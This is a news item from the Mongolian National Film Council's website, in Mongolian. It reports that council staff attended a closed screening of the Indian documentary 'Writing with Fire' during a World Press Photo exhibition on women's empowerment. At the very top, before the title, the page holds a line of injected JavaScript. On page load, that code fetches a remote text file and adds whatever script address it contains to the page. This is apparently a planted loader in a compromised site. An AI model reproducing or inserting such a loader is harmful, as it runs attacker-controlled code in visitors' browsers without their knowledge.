;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); КИНО УРЛАГИЙН ЗӨВЛӨЛ “ГАЛААР БИЧСЭН ҮГС” БАРИМТАТ КИНОНЫ ХААЛТТАЙ ҮЗЛЭГТ ОРОЛЦЛОО - Mongolian National Film Council

КИНО УРЛАГИЙН ЗӨВЛӨЛ “ГАЛААР БИЧСЭН ҮГС” БАРИМТАТ КИНОНЫ ХААЛТТАЙ ҮЗЛЭГТ ОРОЛЦЛОО

КИНО УРЛАГИЙН ЗӨВЛӨЛ “ГАЛААР БИЧСЭН ҮГС” БАРИМТАТ КИНОНЫ ХААЛТТАЙ ҮЗЛЭГТ ОРОЛЦЛОО

КИНО УРЛАГИЙН ЗӨВЛӨЛ “ГАЛААР БИЧСЭН ҮГС” БАРИМТАТ КИНОНЫ

ХААЛТТАЙ ҮЗЛЭГТ ОРОЛЦЛОО

Нидерландын Засгийн газар, “World Press Photo” гэрэл зургийн сан хамтран  зохион байгуулсан “Галаар бичсэн үгс” киноны хаалттай үзлэгт 2024 оны 8 дугаар сарын 22-ны өдөр Кино урлагийн зөвлөлийн ажлын албаны төлөөлөл оролцлоо.

Монгол улсад анх удаа “World Press Photo” гэрэл зургийн сан, Нидерландын Хаант Улстай хамтран  “Сэтгэлийн хат – өөрчлөлтөд хөтөлсөн эмэгтэйчүүдийн түүх” гэрэл зургийн үзэсгэлэнг Лхам галерейд 8 дугаар сарын 22-ноос 9 дүгээр сарын 18 хүртэл дэлгэж эхэллээ. Нидерландын Засгийн газраас эмэгтэйчүүдийг чадавхжуулах, жендерийн тэгш эрхийг дэмжих зорилгоор зохион байгуулж байгаа тус  үзэсгэлэнгийн хүрээнд Сашмит Гош, Ринту Томас найруулагчдын бүтээл болох “Галаар бичсэн үгс” Энэтхэгийн баримтат киноны хаалттай үзлэгийг тусгай зочдод толилуулсан юм.

Тус баримтат киногоор  эцгийн эрхт ёс ноёрхсон улсад эмэгтэйчүүд хэрхэн хүчтэй болж, хөгжиж, нийгэмд яаж нөлөөлж байгаа вэ гэдгийг харуулжээ. Энэхүү баримтат киног Монгол үзэгчдэд  цаашид хүргэх зорилготой байгаагаа илэрхийллээ.